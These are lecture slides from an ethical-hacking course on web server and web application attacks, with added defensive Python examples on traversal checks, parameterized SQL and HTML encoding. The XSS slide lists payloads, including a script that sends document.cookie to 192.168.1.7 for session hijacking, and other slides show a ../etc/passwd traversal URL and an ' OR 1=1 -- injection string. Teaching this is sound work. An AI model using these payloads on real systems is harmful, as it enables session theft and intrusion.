Lecture 8

The document discusses ethical hacking with a focus on web servers and web applications, detailing their functions, common attack methodologies, and specific vulnerabilities such as XSS and SQL injection. It outlines various types of web server and application attacks, tools used for these attacks, and emphasizes the importance of security measures like patch management and proper configuration. Additionally, it highlights the significance of understanding different types of XSS attacks and strategies to mitigate web server vulnerabilities.

Uploaded by

cirejic638

University of Babylon
College of Information Technology
Department of Information Security

Ethical Hacking
Lecture 8: Hacking Web Servers and Web Applications

Asst. Lect. Rasha Hussein


Understand Web Server
• The primary function of a web server is to serve web pages in response to
client requests using the Hypertext Transfer Protocol (HTTP).
This means the delivery of HTML documents and any additional
content that may be included by a document, such as images, style
sheets, and scripts.
• A user agent, commonly a web browser or web crawler, initiates
communication by making a request for a specific resource using
HTTP, and the server responds with the content of that resource or
an error message if unable to do so. The resource is typically a real
file on the server's secondary storage, but this is not necessarily the
case and depends on how the web server is implemented.
Understand Web Application
• Web applications are programs that reside on a web
server to give the user functionality beyond just a
website. Database queries, webmail, discussion
groups, and blogs are all examples of web applications.
• A web application uses a client/server architecture,
with a web browser as the client and the web server
acting as the application server. JavaScript is a popular
way to implement web applications. Since web
applications are widely implemented, any user with a
web browser can interact with most site utilities.
Web Application Attacks
Web Server Attacks

• DNS Amplification - uses recursive DNS to DoS a target; amplified DNS answers are sent to the target until it
can no longer respond. (Botnet)

• Directory Traversal (../ or dot-dot-slash) - requests a file that should not be accessible from the web
server. Example: http://www.example.com/../../../../etc/passwd
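
One way a server can refuse the dot-dot-slash request described above, shown as an added example that is not part of the original lecture. The function name `resolve_under_root`, the throwaway web root and the request URLs are constructed for illustration, and POSIX paths are assumed.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import unquote, urlsplit

def resolve_under_root(web_root: str, url: str) -> Optional[str]:
    """Map a request URL to a file path; None if it would leave web_root."""
    # Decode percent-encoding first so "%2e%2e/" is judged the same as "../".
    rel = unquote(urlsplit(url).path).lstrip("/")
    if "\x00" in rel:  # "%00" truncation tricks never name a real file
        return None
    root = os.path.realpath(web_root)
    # realpath collapses ".." segments and resolves symlinks before the check.
    candidate = os.path.realpath(os.path.join(root, rel))
    # commonpath compares whole path components, so "/www2" is not under "/www".
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate

def demo() -> dict:
    """Check constructed request URLs against a throwaway web root."""
    urls = {
        "normal": "http://www.example.com/index.html",
        "dot_dot_slash": "http://www.example.com/../../../../etc/passwd",
        "percent_encoded": "http://www.example.com/%2e%2e/%2e%2e/etc/passwd",
        "sibling_prefix": "http://www.example.com/../www2/secret.txt",
        "null_byte": "http://www.example.com/index.html%00.jpg",
    }
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "www")
        os.makedirs(root)
        os.makedirs(os.path.join(tmp, "www2"))  # sibling sharing the prefix
        return {k: resolve_under_root(root, u) is not None
                for k, u in urls.items()}

if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:16} served={allowed}")
```

The check runs on the resolved path rather than on the raw string, which is why the encoded and sibling-directory variants are rejected along with the plain `../` form.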
Web Server Attacks

• Parameter Tampering (URL Tampering) (IDOR) - manipulating parameters within the URL to achieve escalation
or other changes.
• Web Cache Poisoning - replacing the cache on a box with a malicious version of it.

• Password Attack - attempting to crack passwords related to web resources


• Misconfiguration Attack - same as before - improper configuration of a web server
Web Server Attacks Methodology

Some of the common web server attack tools include: Metasploit, MPack, Zeus, Neosploit
Web Server Architecture
Web Application Attacks
• Most often hacked because of inherent weaknesses built into the program
• First step is to identify entry points (POST data, URL parameters, cookies, headers, etc.)
• Tools for Identifying Entry Points
  o Burp Suite
• Injection
  o File Injection - attacker injects a pointer in a web form to an exploit hosted elsewhere
  o Command Injection - attacker gains shell access using Java or similar
  o SOAP Injection - inject query strings in order to bypass authentication
    o SOAP uses XML to format information
    o Messages are "one way" in nature
  o LDAP Injection - exploits applications that construct LDAP statements
    o Format for LDAP injection includes
  o SQL Injection - injecting SQL commands into input fields to produce output; typical inputs: single quote ('), double dash (--), and " OR 1=1
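
The SQL injection inputs listed above, run against a string-built query and its parameterized replacement. This is an added example, not part of the original lecture; the `users` table, its rows and the function names are constructed for illustration.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """In-memory table holding constructed sample accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, note TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "a"), ("bob", "b"), ("o'brien", "c")])
    return db

def lookup_concatenated(db: sqlite3.Connection, name: str) -> list:
    # Vulnerable form: the input becomes part of the SQL text itself.
    query = "SELECT name FROM users WHERE name = '" + name + "'"
    return sorted(row[0] for row in db.execute(query))

def lookup_parameterized(db: sqlite3.Connection, name: str) -> list:
    # Hardened form: the driver binds the input as a value, never as SQL.
    cur = db.execute("SELECT name FROM users WHERE name = ?", (name,))
    return sorted(row[0] for row in cur)

def quote_breaks_query(db: sqlite3.Connection, name: str) -> bool:
    """True if the input changes the statement's syntax (the ' test)."""
    try:
        lookup_concatenated(db, name)
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    db = make_db()
    tautology = "' OR 1=1 --"  # built from the characters the slide lists
    print(lookup_concatenated(db, tautology))   # every row comes back
    print(lookup_parameterized(db, tautology))  # no user has that name
    print(quote_breaks_query(db, "o'brien"))    # a legitimate name breaks it
    print(lookup_parameterized(db, "o'brien"))  # binding handles the quote
```

The legitimate name `o'brien` failing in the concatenated version shows that the defect is in how the query is built, not in any particular input.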
Web Application Attacks

• Many web application threats exist on a web server. The following are the
most common threats:
• XSS
• Command Execution
• HTTP Brute Force
• Remote File Upload
• SQL Injection
• CSRF
Cross-site Scripting (XSS)

• Understand Cross-site Scripting (XSS)


• Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts
are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS)
attacks occur when an attacker uses a web application to send malicious code, generally
in the form of a browser side script, to a different end user. Flaws that allow these
attacks to succeed are quite widespread and occur anywhere a web application uses
input from a user in the output it generates without validating or encoding it.
• An attacker can use XSS to send a malicious script to an unsuspecting user. The end
user’s browser has no way to know that the script should not be trusted, and will
execute the script. Because it thinks the script came from a trusted source, the
malicious script can access any cookies, session tokens, or other sensitive information
retained by your browser and used with that site. These scripts can even rewrite the
content of the HTML page.
What are the types of XSS attacks?
• Reflected XSS (AKA Non-Persistent or Type I)
• Reflected XSS occurs when user input is immediately returned by a web application in an error message, search
result, or any other response that includes some or all of the input provided by the user as part of the request, without
that data being made safe to render in the browser, and without permanently storing the user provided data. In some
cases, the user provided data may never even leave the browser (see DOM Based XSS below).
• Stored XSS (AKA Persistent or Type II)
• Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum,
visitor log, comment field, etc. And then a victim is able to retrieve the stored data from the web application without
that data being made safe to render in the browser. With the advent of HTML5, and other browser technologies, we
can envision the attack payload being permanently stored in the victim’s browser, such as an HTML5 database, and
never being sent to the server at all.
• DOM Based XSS (AKA Type-0)
• DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is
executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side
script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is)
does not change, but the client side code contained in the page executes differently due to the malicious modifications
that have occurred in the DOM environment.
Malicious script for XSS attack

• Reflected XSS Attacks Threat


• Find XSS vulnerabilities
o <script>alert('rasha')</script>
o <script>alert(document.cookie)</script>
o <script>document.location="http://google.com"</script>
• Reflected XSS Attacks with session hijacking
• <script>document.location='http://192.168.1.7/index.php?'+document.cookie;</script>
• Encoder script: http://meyerweb.com/eric/tools/dencoder/
• Inject cookie with Cookie Manager+
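
The alert probes above, rendered by a page that copies input into its output and by one that encodes it first, with the session cookie marked HttpOnly so that `document.cookie` cannot read it. This is an added example, not part of the original lecture; the search-page markup, function names and cookie value are constructed for illustration.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Probes quoted from the slide above; they only open an alert box.
PROBES = ["<script>alert('rasha')</script>",
          "<script>alert(document.cookie)</script>"]

def render_unsafe(q: str) -> str:
    # Vulnerable: request input is copied into the response as markup.
    return f"<p>No results for {q}</p>"

def render_encoded(q: str) -> str:
    # Hardened: & < > " ' become entities, so the browser shows plain text.
    return f"<p>No results for {html.escape(q, quote=True)}</p>"

class _Audit(HTMLParser):
    """Collects what an HTML parser builds from a response body."""
    def __init__(self):
        super().__init__()
        self.tags, self.text = [], []
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
    def handle_data(self, data):
        self.text.append(data)

def audit(page: str) -> tuple:
    """Return (number of <script> elements, visible text) for a page."""
    a = _Audit()
    a.feed(page)
    a.close()
    return a.tags.count("script"), "".join(a.text)

def session_cookie(value: str) -> str:
    # HttpOnly keeps the cookie out of document.cookie even if a script runs.
    c = SimpleCookie()
    c["session"] = value
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    return c["session"].OutputString()

if __name__ == "__main__":
    for p in PROBES:
        print(audit(render_unsafe(p))[0], audit(render_encoded(p)))
    print(session_cookie("constructed-session-id"))
```

The same `audit` function works as a regression test: any response that reflects a probe should report zero script elements.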
How to avoid attacks on Web server
• An organization can adopt the following policy to protect itself against web server attacks.
• Patch management – this involves installing patches to help secure the server. A patch is an update that
fixes a bug in the software. The patches can be applied to the operating system and the web server
system.
• Secure installation and configuration of the operating system
• Secure installation and configuration of the web server software
• Vulnerability scanning system – these include tools such as Snort, Nmap, Scanner Access Now Easy
(SANE)
• Firewalls can be used to stop simple DoS attacks by blocking all traffic coming from the identified source IP
addresses of the attacker.
• Antivirus software can be used to remove malicious software on the server
• Disabling Remote Administration
• Default accounts and unused accounts must be removed from the system
• Default ports & settings (like FTP at port 21) should be changed to custom port & settings (FTP port
at 5069)
Thank You
